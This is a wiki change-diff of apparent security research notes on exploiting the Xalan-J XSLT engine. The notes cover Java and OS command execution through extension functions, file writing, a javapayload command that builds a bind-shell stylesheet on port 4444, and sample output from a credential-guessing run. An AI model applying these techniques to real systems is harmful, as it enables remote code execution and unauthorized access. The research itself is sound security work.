Skip to Content

Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35
From version Icon 78.1 Icon
edited by Nicolas Gregoire
on 2012/01/31 18:32
Change comment: There is no comment for this version
To version Icon 73.1 Icon
edited by Nicolas Gregoire
on 2012/01/17 09:27
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -45,8 +45,6 @@
45 45  
46 46  = Java code execution =
47 47  
48 -== Basic Java calls ==
49 -
50 50  The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
51 51  
52 52  |=Namespace|=Extension function|=PoC|=Sample output
... ... @@ -53,17 +53,6 @@
53 53  |http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date:
54 54  Wed Jan 11 22:45:07 CET 2012
55 55  
56 -== Executing arbitrary classes ==
57 -
58 --- It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-( --
59 -
60 -{{warning}}
61 -TODO : javapayload => loading arbitrary byte code (aka classes) via reflection
62 -$> java javapayload.builder.Builder Template XalanJ.xsl bind-jsh-4444.xsl BindTCP 127.0.0.1 4444 - - JSh
63 -List supported payloads !
64 -Check supported versions of Xalan !
65 -{{/warning}}
66 -
67 67  = OS command execution =
68 68  
69 69  Once Java code execution is possible, it is trivial to execute arbitrary OS commands using the java.lang.Runtime class.
... ... @@ -90,6 +90,16 @@
90 90  
91 91  It is of course possible to include commands for multiples OS in one file and to execute only the relevant ones.
92 92  
80 += Pure Java reverse-shell =
81 +
82 +It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-(
83 +
84 +{{warning}}
85 +TODO : javapayload => loading arbitrary byte code (aka classes) via reflection
86 +$> java javapayload.builder.Builder Template XalanJ.xsl bind-jsh-4444.xsl BindTCP 127.0.0.1 4444 - - JSh
87 +Check supported versions of Xalan !
88 +{{/warning}}
89 +
93 93  = File creation =
94 94  
95 95  The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten.
... ... @@ -120,10 +120,3 @@
120 120  Username : [root] / Password : [uberpasswd] :
121 121  Username : [root] / Password : [cnam] : OK !!
122 122  Username : [pma] / Password : [pma] : ##
123 -
124 -= Anti XEE =
125 -
126 -DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
127 -builderFactory.setExpandEntityReferences(false); <<<<==[Here]==<<<<
128 -DocumentBuilder builder = builderFactory.newDocumentBuilder();
129 -DOMSource xmlSource = new DOMSource(builder.parse(new ByteArrayInputStream(myXmlString.getBytes(~)~)~));